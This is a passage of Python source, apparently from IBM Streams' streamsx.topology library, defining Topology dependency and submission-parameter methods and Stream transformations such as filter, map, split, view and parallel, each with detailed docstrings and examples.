Add a file or directory dependency into an Streams application bundle.
Ensures that the file or directory at `path` on the local system
will be available at runtime.
The file will be copied and made available relative to the
application directory. Location determines where the file
is relative to the application directory. Two values for
location are supported `etc` and `opt`.
The runtime path relative to application directory is returned.
The copy is made during the submit call thus the contents of
the file or directory must remain available until submit returns.
For example calling
``add_file_dependency('/tmp/conf.properties', 'etc')``
will result in contents of the local file `conf.properties`
being available at runtime at the path `application directory`/etc/conf.properties. This call returns ``etc/conf.properties``.
Python callables can determine the application directory at
runtime with :py:func:`~streamsx.ec.get_application_directory`.
For example the path above at runtime is
``os.path.join(streamsx.ec.get_application_directory(), 'etc', 'conf.properties')``
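A short sketch, using the hypothetical local file above::

    topo = Topology()
    rel_path = topo.add_file_dependency('/tmp/conf.properties', 'etc')
    # rel_path == 'etc/conf.properties'
    # At runtime a callable can resolve the absolute path with:
    # os.path.join(streamsx.ec.get_application_directory(), rel_path)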
Args:
path(str): Path of the file on the local system.
location(str): Location of the file in the bundle relative to the application directory.
Returns:
str: Path relative to application directory that can be joined at runtime with ``get_application_directory``.
.. versionadded:: 1.7
"""
if location not in {'etc', 'opt'}:
raise ValueError(location)
if not os.path.isfile(path) and not os.path.isdir(path):
raise ValueError(path)
path = os.path.abspath(path)
if location not in self._files:
self._files[location] = [path]
else:
self._files[location].append(path)
return location + '/' + os.path.basename(path)
def add_pip_package(self, requirement):
"""
Add a Python package dependency for this topology.
If the package defined by the requirement specifier
is not pre-installed on the build system then the
package is installed using `pip` and becomes part
of the Streams application bundle (`sab` file).
The package is expected to be available from `pypi.org`.
If the package is already installed on the build system
then it is not added into the `sab` file.
The assumption is that the runtime hosts for a Streams
instance have the same Python packages installed as the
build machines. This is always true for IBM Cloud
Pak for Data and the Streaming Analytics service on IBM Cloud.
The project name extracted from the requirement
specifier is added to :py:attr:`~exclude_packages`
to avoid the package being added by the dependency
resolver. Thus the package should be added before
it is used in any stream transformation.
When an application is run with trace level ``info``
the available Python packages on the running system
are listed to application trace. This includes
any packages added by this method.
Example::
topo = Topology()
# Add dependency on pint package
# and astral at version 0.8.1
topo.add_pip_package('pint')
topo.add_pip_package('astral==0.8.1')
Args:
requirement(str): Package requirements specifier.
.. warning::
Only supported when using the build service with
a Streams instance in Cloud Pak for Data
or Streaming Analytics service on IBM Cloud.
.. note::
Installing packages through `pip` is preferred to
the automatic dependency checking performed on local
modules. This is because `pip` will perform a full
install of the package including any dependent packages
and additional files, such as shared libraries, that
might be missed by dependency discovery.
.. versionadded:: 1.9
"""
self._pip_packages.append(str(requirement))
pr = pkg_resources.Requirement.parse(requirement)
self.exclude_packages.add(pr.project_name)
def create_submission_parameter(self, name, default=None, type_=None):
""" Create a submission parameter.
A submission parameter is a handle for a value that
is not defined until topology submission time. Submission
parameters enable the creation of reusable topology bundles.
A submission parameter has a `name`. The name must be unique
within the topology.
The returned parameter is a `callable`.
Prior to submitting the topology, while constructing the topology,
invoking it returns ``None``.
After the topology is submitted, invoking the parameter
within the executing topology returns the actual submission time value
(or the default value if it was not set at submission time).
Submission parameters may be used within functional logic. e.g.::
threshold = topology.create_submission_parameter('threshold', 100);
# s is some stream of integers
s = ...
s = s.filter(lambda v : v > threshold())
.. note::
The parameter (value returned from this method) is only
supported within a lambda expression or a callable
that is not a function.
The default type of a submission parameter's value is a `str`.
When a `default` is specified
the type of the value matches the type of the default.
If `default` is not set, then the type can be set with `type_`.
The types supported are ``str``, ``int``, ``float`` and ``bool``.
Topology submission behavior when a submission parameter
lacking a default value is created and a value is not provided at
submission time is defined by the underlying topology execution runtime.
* Submission fails for contexts ``DISTRIBUTED``, ``STANDALONE``, and ``STREAMING_ANALYTICS_SERVICE``.
Args:
name(str): Name for submission parameter.
default: Default parameter when submission parameter is not set.
type_: Type of parameter value when default is not set. Supported values are `str`, `int`, `float` and `bool`.
.. versionadded:: 1.9
"""
if name in self._submission_parameters:
raise ValueError("Submission parameter {} already defined.".format(name))
sp = streamsx.topology.runtime._SubmissionParam(name, default, type_)
self._submission_parameters[name] = sp
return sp
@property
def checkpoint_period(self):
"""Enable checkpointing for the topology, and define the checkpoint
period.
When checkpointing is enabled, the state of all stateful operators
is saved periodically. If the operator restarts, its state is
restored from the most recent checkpoint.
The checkpoint period is the frequency at which checkpoints will
be taken. It can either be a :py:class:`~datetime.timedelta` value
or a floating point value in seconds. It must be 0.001
seconds or greater.
A stateful operator is an operator whose callable is an instance of a
Python callable class.
Examples::
# Create a topology that will checkpoint every thirty seconds
topo = Topology()
topo.checkpoint_period = 30.0
::
# Create a topology that will checkpoint every two minutes
topo = Topology()
topo.checkpoint_period = datetime.timedelta(minutes=2)
.. versionadded:: 1.11
"""
return self._checkpoint_period
@checkpoint_period.setter
def checkpoint_period(self, period):
if (isinstance(period, datetime.timedelta)):
self._checkpoint_period = period.total_seconds()
else:
self._checkpoint_period = float(period)
# checkpoint period must be greater or equal to 0.001
if self._checkpoint_period < 0.001:
raise ValueError("checkpoint_period must be 0.001 or greater")
def _prepare(self):
"""Prepare object prior to SPL generation."""
self._generate_requirements()
def _generate_requirements(self):
"""Generate the info to create requirements.txt in the toookit."""
if not self._pip_packages:
return
reqs = ''
for req in self._pip_packages:
reqs += "{}\n".format(req)
reqs_include = {
'contents': reqs,
'target':'opt/python/streams',
'name': 'requirements.txt'}
if 'opt' not in self._files:
self._files['opt'] = [reqs_include]
else:
self._files['opt'].append(reqs_include)
def _add_job_control_plane(self):
"""
Add a JobControlPlane operator to the topology, if one has not already
been added. If a JobControlPlane operator has already been added,
this has no effect.
"""
if not self._has_jcp:
jcp = self.graph.addOperator(kind="spl.control::JobControlPlane", name="JobControlPlane")
jcp.viewable = False
self._has_jcp = True
class Stream(_placement._Placement, object):
"""
The Stream class is the primary abstraction within a streaming application. It represents a potentially infinite
series of tuples which can be operated upon to produce another stream, as in the case of :py:meth:`map`, or
terminate a stream, as in the case of :py:meth:`for_each`.
.. versionchanged:: 1.14
Type hints are used to define stream schemas and verify transformations
at declaration time.
"""
def __init__(self, topology, oport, other=None):
self.topology = topology
self.oport = oport
self._placeable = False
self._alias = None
self._hints = None
topology._streams[self.oport.name] = self
self._json_stream = None
if other:
self._add_hints(other._hints)
def _op(self):
if not self._placeable:
raise TypeError()
return self.oport.operator
def _add_hints(self, hints):
self._hints = hints
return self
@property
def name(self):
"""
Unique name of the stream.
When declaring a stream a `name` parameter can be provided.
If the supplied name is unique within its topology then
it will be used as-is, otherwise a variant will be provided
that is unique within the topology.
If a `name` parameter was not provided when declaring a stream
then the stream is assigned a unique generated name.
Returns:
str: Name of the stream.
.. seealso:: :py:meth:`aliased_as`
.. warning::
If the name is not a valid SPL identifier or longer than
80 characters then the name will be
converted to a valid SPL identifier at compile and runtime.
This identifier will be the name used in the REST api and log/trace.
Visualizations of the runtime graph uses `name` rather
than the converted identifier.
A valid SPL identifier consists only of
characters ``A-Z``, ``a-z``, ``0-9``, ``_`` and
must not start with a number or be an SPL keyword.
See :py:meth:`runtime_id <runtime_id>`.
"""
return self._alias if self._alias else self.oport.name
@property
def runtime_id(self):
"""
Return runtime identifier.
If :py:meth:`name <name>` is not a valid SPL identifier then the
runtime identifier will be valid SPL identifier that represents `name`.
Otherwise `name` is returned.
The runtime identifier is how the underlying SPL operator
or output port is named in the REST api and trace/log files.
If a topology unique name is supplied when creating a stream then the runtime
identifier is fixed regardless of other changes in the topology.
The algorithm to determine the runtime name (for clients that
cannot call this method, for example, remote REST clients gathering
metrics) is as follows.
If the length of :py:meth:`name <name>` is less than or equal
to 80 and ``name`` is an SPL identifier then ``name`` is used.
An SPL identifier consists only of the characters ``A-Z``, ``a-z``
``0-9`` and ``_``, must not start with ``0-9`` and must not be
an SPL keyword.
Otherwise the identifier has the form ``prefix_suffix``.
``prefix`` is the kind of the SPL operator stripped of
its namespace and ``::``. For all functional methods
the operator kind is the method name with the first
character upper-cased.
For example, ``Filter`` for :py:meth:`filter`, ``Beacon`` for
``spl::utility::Beacon``.
``suffix`` is a hashed version of name: an MD5 digest
``d`` is calculated from the UTF-8 encoding of ``name``.
``d`` is shortened by having its first eight bytes xor folded
with its last eight bytes. ``d`` is then base64 encoded
to produce a string. Padding ``=`` and ``+`` and ``/`` characters
are removed from the string.
For example, ``s.filter(lambda x : True, name='你好')``
results in a runtime identifier of ``Filter_oGwCfhWRg4``.
The default mapping can be overridden by setting :py:attr:`Topology.name_to_runtime_id` to a callable that returns a valid identifier for its single argument. The returned identifier should be unique within the topology. For example using a pre-populated `dict` as the mapper::
topo = Topology()
names = {'你好':'Buses', '培养':'Trains'}
topo.name_to_runtime_id = names.get
buses = topo.source(..., name='你好')
trains = topo.source(..., name='培养')
# buses.runtime_id will be Buses
# trains.runtime_id will be Trains
Returns:
str: Runtime identifier of the stream.
.. versionadded:: 1.14
"""
return self.oport.runtime_id
def aliased_as(self, name):
"""
Create an alias of this stream.
Returns an alias of this stream with name `name`.
When invocation of an SPL operator requires an
:py:class:`~streamsx.spl.op.Expression` against
an input port this can be used to ensure expression
matches the input port alias regardless of the name
of the actual stream.
Example use where the filter expression for a ``Filter`` SPL operator
uses ``IN`` to access input tuple attribute ``seq``::
s = ...
s = s.aliased_as('IN')
params = {'filter': op.Expression.expression('IN.seq % 4ul == 0ul')}
f = op.Map('spl.relational::Filter', s, params = params)
Args:
name(str): Name for returned stream.
Returns:
Stream: Alias of this stream with ``name`` equal to `name`.
.. versionadded:: 1.9
"""
stream = copy.copy(self)
stream._alias = name
return stream
def for_each(self, func, name=None):
"""
Sends information as a stream to an external system.
The transformation defined by `func` is a callable
or a composite transformation.
.. rubric:: Callable transformation
If `func` is callable then for each tuple `t` on this
stream ``func(t)`` is called.
If invoking ``func`` for a tuple on the stream raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by returning a true value from its ``__exit__`` method. When an
exception is suppressed no further processing occurs for the
input tuple that caused the exception.
.. rubric:: Composite transformation
A composite transformation is an instance of :py:class:`~streamsx.topology.composite.ForEach`. Composites allow the application developer to use
the standard functional style of the topology api while
allowing expansion of a `for_each` transform to multiple basic
transformations.
Args:
func: A callable that takes a single parameter for the tuple and returns None.
name(str): Name of the stream, defaults to a generated name.
Returns:
streamsx.topology.topology.Sink: Stream termination.
.. rubric:: Type hints
The argument type hint on `func` is used (if present) to verify
at topology declaration time that it is compatible with the
type of tuples on this stream.
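A minimal sketch of a hypothetical sink class that writes each tuple as a
line to a file opened at runtime::

    class ToFile(object):
        def __init__(self, path):
            self.path = path
            self.handle = None
        def __enter__(self):
            self.handle = open(self.path, 'w')
        def __exit__(self, exc_type, exc_value, traceback):
            if self.handle:
                self.handle.close()
        def __call__(self, tuple_):
            self.handle.write(str(tuple_) + '\n')

    s = ...
    s.for_each(ToFile('/tmp/tuples.txt'))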
.. versionchanged:: 1.7
Now returns a :py:class:`Sink` instance.
.. versionchanged:: 1.14
Support for type hints and composite transformations.
"""
import streamsx.topology.composite
if isinstance(func, streamsx.topology.composite.ForEach):
return func._add(self, name)
streamsx._streams._hints.check_for_each(func, self)
sl = _SourceLocation(_source_info(), 'for_each')
_name = self.topology.graph._requested_name(name, action='for_each', func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::ForEach", func, name=_name, sl=sl, stateful=stateful)
op.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
op._layout(kind='ForEach', name=op.runtime_id, orig_name=name)
return Sink(op)
def filter(self, func, name=None):
"""
Filters tuples from this stream using the supplied callable `func`.
For each stream tuple `t` on the stream ``func(t)`` is called, if the return evaluates to ``True`` the
tuple will be present on the returned stream, otherwise the tuple is filtered out.
Args:
func: Filter callable that takes a single parameter for the stream tuple.
name(str): Name of the stream, defaults to a generated name.
If invoking ``func`` for a stream tuple raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by returning a true value from its ``__exit__`` method. When an
exception is suppressed no tuple is submitted to the filtered
stream corresponding to the input tuple that caused the exception.
Returns:
Stream: A Stream containing tuples that have not been filtered out. The schema of the returned stream is the same as this stream's schema.
.. rubric:: Type hints
The argument type hint on `func` is used (if present) to verify
at topology declaration time that it is compatible with the
type of tuples on this stream.
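A simple sketch keeping only non-negative values::

    topo = Topology()
    nums = topo.source([-1, 0, 7, -3, 2])
    non_neg = nums.filter(lambda v : v >= 0)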
"""
streamsx._streams._hints.check_filter(func, self)
sl = _SourceLocation(_source_info(), 'filter')
_name = self.topology.graph._requested_name(name, action="filter", func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::Filter", func, name=_name, sl=sl, stateful=stateful)
op.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
op._layout(kind='Filter', name=op.runtime_id, orig_name=name)
oport = op.addOutputPort(schema=self.oport.schema, name=_name)
return Stream(self.topology, oport)._make_placeable()
def split(self, into, func, names=None, name=None):
"""
Splits tuples from this stream into multiple independent streams
using the supplied callable `func`.
For each tuple on the stream ``int(func(tuple))`` is called, if the
return is zero or positive then the (unmodified) tuple will be
present on one, and only one, of the output streams.
The specific stream will
be at index ``int(func(tuple)) % N`` in the returned list,
where ``N`` is the number of output
streams. If the return is negative then the tuple is dropped.
``split`` is used to declare disparate transforms on each
split stream. This differs to :py:meth:`parallel` where
each channel has the same logic transforms.
Args:
into(int): Number of streams the input is split into, must be greater than zero.
func: Split callable that takes a single parameter for the tuple.
names(list[str]): Names of the returned streams, in order. If not supplied or a stream doesn't have an entry in `names` then a generated name is used. Entries are used to generate the field names of the returned named tuple.
name(str): Name of the split transform, defaults to a generated name.
If invoking ``func`` for a tuple on the stream raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by returning a true value from its ``__exit__`` method. When an
exception is suppressed no tuple is submitted to the filtered
stream corresponding to the input tuple that caused the exception.
Returns:
namedtuple: Named tuple of streams this stream is split across. All returned streams have the same schema as this stream.
.. rubric:: Type hints
The argument type hint on `func` is used (if present) to verify
at topology declaration time that it is compatible with the
type of tuples on this stream.
.. rubric:: Examples
Example of splitting a stream based upon message severity, dropping
any messages with unknown severity, and then performing different
transforms for each severity::
msgs = topo.source(ReadMessages())
SEVS = {'H':0, 'M':1, 'L':2}
severities = msgs.split(3, lambda msg : SEVS.get(msg.get('SEV'), -1),
names=['high','medium','low'], name='SeveritySplit')
high_severity = severities.high
high_severity.for_each(SendAlert())
medium_severity = severities.medium
medium_severity.for_each(LogMessage())
low_severity = severities.low
low_severity.for_each(Archive())
.. seealso:: :py:meth:`parallel`
.. versionadded:: 1.13
"""
streamsx._streams._hints.check_split(func, self)
sl = _SourceLocation(_source_info(), 'split')
_name = self.topology.graph._requested_name(name, action="split", func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::Split", func, name=_name, sl=sl, stateful=stateful)
op.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
op._layout(kind='Split', name=op.runtime_id, orig_name=name)
streams = []
nt_names = []
op_name = name if name else _name
for port_id in range(into):
# logical name
lsn = names[port_id] if names and len(names) > port_id else op_name + '_' + str(port_id)
sn = self.topology.graph._requested_name(lsn)
oport = op.addOutputPort(schema=self.oport.schema, name=sn)
streams.append(Stream(self.topology, oport)._make_placeable())
nt_names.append(lsn)
op._layout(name=oport.runtime_id, orig_name=lsn)
nt = collections.namedtuple(op_name, nt_names, rename=True)
return nt._make(streams)
def _map(self, func, schema, name=None):
schema = streamsx.topology.schema._normalize(schema)
_name = self.topology.graph._requested_name(name, action="map", func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::Map", func, name=_name, stateful=stateful)
op.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
oport = op.addOutputPort(schema=schema, name=_name)
op._layout(name=op.runtime_id, orig_name=name)
return Stream(self.topology, oport)._make_placeable()
def view(self, buffer_time = 10.0, sample_size = 10000, name=None, description=None, start=False):
"""
Defines a view on a stream.
A view is a continually updated sampled buffer of a streams's tuples.
Views allow visibility into a stream from external clients such
as Jupyter Notebooks, the Streams console,
`Microsoft Excel <https://www.ibm.com/support/knowledgecenter/SSCRJU_4.2.0/com.ibm.streams.excel.doc/doc/excel_overview.html>`_ or REST clients.
The view created by this method can be used by external clients
and through the returned :py:class:`~streamsx.topology.topology.View` object after the topology is submitted. For example a Jupyter Notebook can
declare and submit an application with views, and then
use the resultant `View` objects to visualize live data within the streams.
When the stream contains Python objects then they are converted
to JSON.
Args:
buffer_time: Specifies the buffer size to use measured in seconds.
sample_size: Specifies the number of tuples to sample per second.
name(str): Name of the view. Name must be unique within the topology. Defaults to a generated name.
description: Description of the view.
start(bool): Start buffering data when the job is submitted.
If `False` then the view starts buffering data when the first
remote client accesses it to retrieve data.
Returns:
streamsx.topology.topology.View: View object which can be used to access the data when the
topology is submitted.
.. note:: Views are only supported when submitting to distributed
contexts including Streaming Analytics service.
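A minimal sketch declaring a view on a source stream (data access through
the returned object happens after the topology is submitted)::

    topo = Topology()
    readings = topo.source(...)
    readings_view = readings.view(name='Readings', description='Live readings')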
"""
if name is None:
name = ''.join(random.choice('0123456789abcdef') for x in range(16))
if self.oport.schema == streamsx.topology.schema.CommonSchema.Python:
if self._json_stream:
view_stream = self._json_stream
else:
self._json_stream = self.as_json(force_object=False)._layout(hidden=True)
view_stream = self._json_stream
# colocate map operator with stream that is being viewed.
if self._placeable:
self._colocate(view_stream, 'view')
else:
view_stream = self
port = view_stream.oport.runtime_id
view_config = {
'name': name,
'port': port,
'description': description,
'bufferTime': buffer_time,
'sampleSize': sample_size}
if start:
view_config['activateOption'] = 'automatic'
view_stream.oport.operator.addViewConfig(view_config)
_view = View(name)
self.topology.graph._views.append(_view)
return _view
def map(self, func=None, name=None, schema=None):
"""
Maps each tuple from this stream into 0 or 1 stream tuples.
The transformation defined by `func` is a callable
or a composite transformation.
.. rubric:: Callable transformation
For each tuple on this stream ``result = func(tuple)`` is called.
If `result` is not `None` then the result will be submitted
as a tuple on the returned stream. If `result` is `None` then
no tuple submission will occur.
By default the submitted tuple is ``result`` without modification
resulting in a stream of picklable Python objects. Setting the
`schema` parameter changes the type of the stream and
modifies each ``result`` before submission.
* ``object`` or :py:const:`~streamsx.topology.schema.CommonSchema.Python` - The default: `result` is submitted.
* ``str`` type or :py:const:`~streamsx.topology.schema.CommonSchema.String` - A stream of strings: ``str(result)`` is submitted.
* ``json`` or :py:const:`~streamsx.topology.schema.CommonSchema.Json` - A stream of JSON objects: ``result`` must be convertible to a JSON object using the `json` package.
* :py:const:`~streamsx.topology.schema.StreamSchema` - A structured stream. `result` must be a `dict` or (Python) `tuple`. When a `dict` is returned the outgoing stream tuple attributes are set by name, when a `tuple` is returned stream tuple attributes are set by position.
* string value - Equivalent to passing ``StreamSchema(schema)``
.. rubric:: Composite transformation
A composite transformation is an instance of :py:class:`~streamsx.topology.composite.Map`. Composites allow the application developer to use
the standard functional style of the topology api while
allowing expansion of a `map` transform to multiple basic
transformations.
Args:
func: A callable that takes a single parameter for the tuple.
If not supplied then a function equivalent to ``lambda tuple_ : tuple_`` is used.
name(str): Name of the mapped stream, defaults to a generated name.
schema(StreamSchema|CommonSchema|str): Schema of the resulting stream.
If invoking ``func`` for a tuple on the stream raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by returning a true value from its ``__exit__`` method. When an
exception is suppressed no tuple is submitted to the mapped
stream corresponding to the input tuple that caused the exception.
Returns:
Stream: A stream containing tuples mapped by `func`.
.. rubric:: Type hints
If `schema` is not set then the return type hint on `func` define the
schema of the returned stream, defaulting to
:py:const:`~streamsx.topology.schema.CommonSchema.Python` if no
type hints are present.
For example `reading_from_json` has a type hint that
defines it as returning ``SensorReading`` instances (typed named tuples).
Thus `readings` has a structured schema matching ``SensorReading`` ::
def reading_from_json(value:dict) -> SensorReading:
return SensorReading(value['id'], value['timestamp'], value['reading'])
topo = Topology()
json_readings = topo.source(HttpReadings()).as_json()
readings = json_readings.map(reading_from_json)
The argument type hint on `func` is used (if present) to verify
at topology declaration time that it is compatible with the
type of tuples on this stream.
.. versionadded:: 1.7 `schema` argument added to allow conversion to
a structured stream.
.. versionadded:: 1.8 Support for submitting `dict` objects as stream tuples to a structured stream (in addition to existing support for `tuple` objects).
.. versionchanged:: 1.11 `func` is optional.
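Example sketch of mapping to a structured stream by returning a ``dict``
(the schema string is illustrative)::

    topo = Topology()
    lines = topo.source(['a b', 'c d e'])
    counts = lines.map(lambda line : {'text': line, 'words': len(line.split())},
                       schema='tuple<rstring text, int32 words>')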
"""
import streamsx.topology.composite
if isinstance(func, streamsx.topology.composite.Map):
return func._add(self, schema, name)
# Schema mapping only, if no change then return original
if func is None and name is None and (schema is not None and
streamsx.topology.schema._normalize(schema) == self.oport.schema):
return self
hints = None
if func is not None:
hints = streamsx._streams._hints.check_map(func, self)
if schema is None:
schema = hints.schema if hints else streamsx.topology.schema.CommonSchema.Python
if func is None:
func = streamsx.topology.runtime._identity
if name is None:
name = 'identity'
ms = self._map(func, schema=schema, name=name)._layout('Map')
ms.oport.operator.sl = _SourceLocation(_source_info(), 'map')
return ms._add_hints(hints)
def flat_map(self, func=None, name=None):
"""
Maps and flattens each tuple from this stream into 0 or more tuples.
For each tuple on this stream ``func(tuple)`` is called.
If the result is not `None` then the result is iterated over
and each value from the iterator that is not `None` is submitted
to the returned stream.
If the result is `None` or an empty iterable then no tuples are submitted to
the returned stream.
Args:
func: A callable that takes a single parameter for the tuple.
If not supplied then a function equivalent to ``lambda tuple_ : tuple_`` is used.
This is suitable when each tuple on this stream is an iterable to be flattened.
name(str): Name of the flattened stream, defaults to a generated name.
If invoking ``func`` for a tuple on the stream raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by returning a true value from its ``__exit__`` method. When an
exception is suppressed no tuples are submitted to the flattened
and mapped stream corresponding to the input tuple
that caused the exception.
Returns:
Stream: A Stream containing flattened and mapped tuples.
Raises:
TypeError: if `func` does not return an iterator or None
.. versionchanged:: 1.11 `func` is optional.
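A simple sketch splitting lines into words::

    topo = Topology()
    lines = topo.source(['mary had a little lamb', 'its fleece was white'])
    words = lines.flat_map(lambda line : line.split())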
"""
hints = None
if func is None:
func = streamsx.topology.runtime._identity
if name is None:
name = 'flatten'
else:
hints = streamsx._streams._hints.check_flat_map(func, self)
sl = _SourceLocation(_source_info(), 'flat_map')
_name = self.topology.graph._requested_name(name, action='flat_map', func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::FlatMap", func, name=_name, sl=sl, stateful=stateful)
op.addInputPort(outputPort=self.oport)
schema = hints.schema if hints else streamsx.topology.schema.CommonSchema.Python
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
oport = op.addOutputPort(name=_name, schema=schema)
return Stream(self.topology, oport)._make_placeable()._layout('FlatMap', name=op.runtime_id, orig_name=name)._add_hints(hints)
def isolate(self):
"""
Guarantees that the upstream operation will run in a separate processing element from the downstream operation.
Returns:
Stream: Stream whose subsequent immediate processing will occur in a separate processing element.
"""
op = self.topology.graph.addOperator("$Isolate$")
# does the addOperator above need the packages
op.addInputPort(outputPort=self.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport, other=self)
def low_latency(self):
"""
The function is guaranteed to run in the same process as the
upstream Stream function. All streams that are created from the returned stream
are also guaranteed to run in the same process until end_low_latency()
is called.
Returns:
Stream
"""
op = self.topology.graph.addOperator("$LowLatency$")
op.addInputPort(outputPort=self.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport, other=self)
def end_low_latency(self):
"""
Returns a Stream that is no longer guaranteed to run in the same process
as the calling stream.
Returns:
Stream
"""
op = self.topology.graph.addOperator("$EndLowLatency$")
op.addInputPort(outputPort=self.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport, other=self)
def parallel(self, width, routing=Routing.ROUND_ROBIN, func=None, name=None):
"""
Split stream into channels and start a parallel region.
Returns a new stream that will contain the contents of
this stream with tuples distributed across its channels.
The returned stream starts a parallel region where all
downstream transforms are replicated across `width` channels.
A parallel region is terminated by :py:meth:`end_parallel`
or :py:meth:`for_each`.
Any transform (such as :py:meth:`map`, :py:meth:`filter`, etc.) in
a parallel region has a copy of its callable executing
independently in parallel. Channels remain independent
of other channels until the region is terminated.
For example with this topology fragment a parallel region
of width 3 is created::
s = ...
p = s.parallel(3)
p = p.filter(F()).map(M())
e = p.end_parallel()
e.for_each(E())
Tuples from ``p`` (parallelized ``s``) are distributed
across three channels, 0, 1 & 2
and are independently processed by three instances of ``F`` and ``M``.
The tuples that pass the filter ``F`` in channel 0 are then mapped
by the instance of ``M`` in channel 0, and so on for channels 1 and 2.
The channels are combined by ``end_parallel`` and so a single instance
of ``E`` processes all the tuples from channels 0, 1 & 2.
This stream instance (the original) is outside of the parallel region
and so any downstream transforms are executed normally.
Adding this `map` transform would result in tuples
on ``s`` being processed by a single instance of ``N``::
n = s.map(N())
The number of channels is set by `width` which may be an `int` greater
than zero or a submission parameter created by
:py:meth:`Topology.create_submission_parameter`.
With IBM Streams 4.3 or later the number of channels can be
dynamically changed at runtime.
Tuples are routed to channels based upon `routing`, see :py:class:`Routing`.
A parallel region can have multiple termination points, for
example when a stream within the stream has multiple transforms
against it::
s = ...
p = s.parallel(3)
m1p = p.map(M1())
m2p = p.map(M2())
p.for_each(E())
m1 = m1p.end_parallel()
m2 = m2p.end_parallel()
Parallel regions can be nested, for example::
s = ...
m = s.parallel(2).map(MO()).parallel(3).map(MI()).end_parallel().end_parallel()
In this case there will be two instances of ``MO`` (the outer region) and six (2x3) instances of ``MI`` (the inner region).
Streams created by :py:meth:`~Topology.source` or
:py:meth:`~Topology.subscribe` are placed in a parallel region
by :py:meth:`set_parallel`.
Args:
width (int): Degree of parallelism.
routing(Routing): Denotes what type of tuple routing to use.
func: Optional function called when :py:const:`Routing.HASH_PARTITIONED` routing is specified.
The function provides an integer value to be used as the hash that determines
the tuple channel routing.
name (str): The name to display for the parallel region.
Returns:
Stream: A stream for which subsequent transformations will be executed in parallel.
.. seealso:: :py:meth:`set_parallel`, :py:meth:`end_parallel`, :py:meth:`split`
"""
_name = name
if _name is None:
_name = self.name + '_parallel'
_name = self.topology.graph._requested_name(_name, action='parallel', func=func)
if routing is None or routing == Routing.ROUND_ROBIN or routing == Routing.BROADCAST:
op2 = self.topology.graph.addOperator("$Parallel$", name=_name)
if name is not None:
op2.config['regionName'] = _name
op2.addInputPort(outputPort=self.oport)
if routing == Routing.BROADCAST:
oport = op2.addOutputPort(width, schema=self.oport.schema, routing="BROADCAST", name=_name)
else:
oport = op2.addOutputPort(width, schema=self.oport.schema, routing="ROUND_ROBIN", name=_name)
return Stream(self.topology, oport, other=self)
elif routing == Routing.HASH_PARTITIONED:
if (func is None):
if self.oport.schema == streamsx.topology.schema.CommonSchema.String:
keys = ['string']
parallel_input = self.oport
elif self.oport.schema == streamsx.topology.schema.CommonSchema.Python:
func = hash
else:
raise NotImplementedError("HASH_PARTITIONED for schema {0} requires a hash function.".format(self.oport.schema))
if func is not None:
keys = ['__spl_hash']
stateful = _determine_statefulness(func)
hash_adder = self.topology.graph.addOperator(self.topology.opnamespace+"::HashAdder", func, stateful=stateful)
hash_adder._op_def['hashAdder'] = True
hash_adder._layout(hidden=True)
hash_schema = self.oport.schema.extend(streamsx.topology.schema.StreamSchema("tuple<int64 __spl_hash>"))
hash_adder.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, hash_adder, 'pyStyle')
parallel_input = hash_adder.addOutputPort(schema=hash_schema)
parallel_op = self.topology.graph.addOperator("$Parallel$", name=_name)
if name is not None:
parallel_op.config['regionName'] = _name
parallel_op.addInputPort(outputPort=parallel_input)
parallel_op_port = parallel_op.addOutputPort(oWidth=width, schema=parallel_input.schema, partitioned_keys=keys, routing="HASH_PARTITIONED")
if func is not None:
# use the Functor passthru operator to remove the hash attribute by removing it from output port schema
hrop = self.topology.graph.addPassThruOperator()
hrop._layout(hidden=True)
hrop.addInputPort(outputPort=parallel_op_port)
parallel_op_port = hrop.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, parallel_op_port, other=self)
else :
raise TypeError("Invalid routing type supplied to the parallel operator")
def end_parallel(self):
"""
Ends a parallel region by merging the channels into a single stream.
Returns:
Stream: Stream for which subsequent transformations are no longer parallelized.
.. seealso:: :py:meth:`set_parallel`, :py:meth:`parallel`
"""
outport = self.oport
if isinstance(self.oport.operator, streamsx.topology.graph.Marker):
if self.oport.operator.kind == "$Union$":
pto = self.topology.graph.addPassThruOperator()
pto.addInputPort(outputPort=self.oport)
outport = pto.addOutputPort(schema=self.oport.schema)
op = self.topology.graph.addOperator("$EndParallel$")
op.addInputPort(outputPort=outport)
oport = op.addOutputPort(schema=self.oport.schema)
endP = Stream(self.topology, oport, other=self)
return endP
def set_parallel(self, width, name=None):
"""
Set this source stream to be split into multiple channels
as the start of a parallel region.
Calling ``set_parallel`` on a stream created by
:py:meth:`~Topology.source` results in the stream
having `width` channels, each created by its own instance
of the callable::
s = topo.source(S())
s.set_parallel(3)
f = s.filter(F())
e = f.end_parallel()
Each channel has independent instances of ``S`` and ``F``. Tuples
